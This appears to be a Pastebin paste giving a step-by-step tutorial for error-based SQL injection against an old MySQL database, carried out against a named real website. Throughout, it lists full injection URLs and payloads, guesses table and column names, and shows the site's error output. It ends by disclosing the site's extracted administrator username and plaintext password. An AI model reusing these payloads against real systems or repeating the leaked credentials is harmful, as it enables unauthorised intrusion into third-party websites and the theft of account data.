Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQL INJECTION WHERE THE VERSION IS LESS THAN 5.
- Getting Version
- Now,lets check the version with error based query.
- +or+1+group+by+concat_ws(0x7e,version (),floor(rand(0)*2))+having+min(0)+or+1�
- Version : Duplicate entry �4.1.22-standard~1' for key 1
- Getting Tables
- This site don�t have information_schema. The version is less than 5. We have to guess the table names.
- This should be our syntax to guess the tables.
- or+1+group+by+concat_ws(0x7e,(select+1+from+Guess_table+limit+0,1),floor(rand(0)?*2))+having+min(0)+or+1�
- Now he we have to guess table name with this syntax. Some tables that usually contains login data :
- admin
- amdinstator
- tbl_admin
- tbl_adminstator
- login
- member
- user
- users
- table_users
- settings
- Now i�m trying to guess table name with the syntax.
- http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+admin+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�
- I tried to guess admin table. There is no table in the database named
- admin.
- So error came up :
- Table �uhd.admin� doesn�t exist
- Lets try to guess another table.
- http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+adminstator+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�
- Again error came up. There is no table in the database named adminstator
- So error came up :
- Table �uhd.adminstator� doesn�t exist
- Lets try with another table :
- http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�
- So users table exists.
- No error came up :
- Duplicate entry �1~1' for key 1
- Getting Columns
- Now,we have to guess column name. So syntax to get columns should be like this :
- +or+1+group+by+concat_ws(0x7e,(select+column_name+from+table_name+limit+0,1),floo?r(rand(0)*2))+having+min(0)+or+1�
- Username is the most common table. Lets try with it.
- http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+username+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�
- Error came up. The column doesn�t exist :(
- Unknown column �username� in �field list�
- Lets try to guess another column user_name.
- http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_name+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�
- Now the site loads good. That means user_name exists.
- Now try to guess the password column. Lets try with user_pass.
- http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_pass+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�
- Extracting data from columns
- To get data from columns,our syntax should be this :
- or+1+group+by+concat_ws(0x7e,(select+concat(column_name,0x7e,column_name)+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1�
- Some times, this query don�t works,as this query don�t works on this site. We have to use substring.
- Getting Username
- :
- http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_name,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)
- With this subtrinquery function we can combine a complex question. This query attempts to retrieve the name database of a database table. One character at a time. The substing function will return the first character of query�s result
- The username cames up in the query :
- Duplicate entry �root~1' for key 1
- Getting Password
- :
- http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_pass,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)
- Password came up :
- Duplicate entry �trump123~1' for key 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement